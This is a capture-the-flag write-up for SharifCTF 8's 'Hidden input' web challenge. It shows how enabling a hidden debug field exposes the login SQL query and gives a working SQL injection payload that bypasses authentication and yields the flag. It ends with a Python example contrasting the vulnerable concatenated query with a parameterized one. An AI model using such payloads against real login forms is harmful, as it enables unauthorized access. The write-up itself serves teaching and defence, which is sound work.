## Information

### Version

| By | Version | Comment |
|---|---|---|
| noraj | 1.0 | Creation |

### CTF
- Name : SharifCTF 8
- Website : ctf.certcc.ir
- Type : Online
- Format : Jeopardy
- CTF Time : link
## 50 - Hidden input - Web
Login if you can :)
There is a hidden input:

```html
<form method="POST" action="login.php">
  <div class="login-block">
    <h1>Login</h1>
    <input type="text" value="" placeholder="Username" id="Username" name="Username"/>
    <input type="password" value="" placeholder="Password" id="Password" name="Password"/>
    <input type="hidden" name="debug" id="debug" value="0">
    <button>Login</button>
  </div>
</form>
```
And change the `debug` POST value to get: `Username=admin&Password=pass&debug=1`.
This shows us the SQL query used:

```
username: admin
password: pass
SQL query: SELECT * FROM users WHERE username=('admin') AND password=('pass')
```
At first I thought this payload should work, but it didn't:

```
Username=admin%27%29--+-&Password=sdf&debug=0
```

```
username: admin')-- -
password: sdf
SQL query: SELECT * FROM users WHERE username=('admin')-- -') AND password=('sdf')
```
Comments don't seem to work, so let's build a fully working query:

```
Username=admin&Password=%27%29+OR+1%3D1+OR+999+%3E+ORD%28%27a&debug=1
```

```
username: admin
password: ') OR 1=1 OR 999 > ORD('a
SQL query: SELECT * FROM users WHERE username=('admin') AND password=('') OR 1=1 OR 999 > ORD('a')
Your flag is: SharifCTF{c58a108967c46222bbdc743e15932c26}
```
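The root cause, shown as an added example (not code from the challenge or the original write-up): the query shape from the debug output built by string concatenation, next to the same query with bound parameters. Assumptions: an in-memory SQLite table stands in for the challenge database, the stored password is constructed, `ORD` is registered as a stand-in for MySQL's function, and the function names are hypothetical.

```python
import sqlite3

def make_db():
    # In-memory stand-in for the challenge database (constructed sample data).
    db = sqlite3.connect(":memory:")
    # SQLite has no ORD(); register a stand-in so the write-up's payload parses.
    db.create_function("ORD", 1, lambda s: ord(s[0]) if s else 0)
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db

def login_concat(db, username, password):
    # Same query shape as the debug output: input is pasted into the SQL text,
    # so a quote and parenthesis in the input close the literal early.
    sql = ("SELECT * FROM users WHERE username=('" + username +
           "') AND password=('" + password + "')")
    return db.execute(sql).fetchone() is not None

def login_bound(db, username, password):
    # Placeholders: input is passed as data and is never parsed as SQL.
    sql = "SELECT * FROM users WHERE username=(?) AND password=(?)"
    return db.execute(sql, (username, password)).fetchone() is not None

PAYLOAD = "') OR 1=1 OR 999 > ORD('a"  # password value from the write-up

if __name__ == "__main__":
    db = make_db()
    for fn in (login_concat, login_bound):
        # Columns: function, result for a wrong password, result for the payload
        print(fn.__name__, fn(db, "admin", "pass"), fn(db, "admin", PAYLOAD))
```

With bound parameters the payload is compared as a literal password string and the login fails. The client-controlled `debug` field that echoes the SQL text is a separate information leak and should not exist in a production handler.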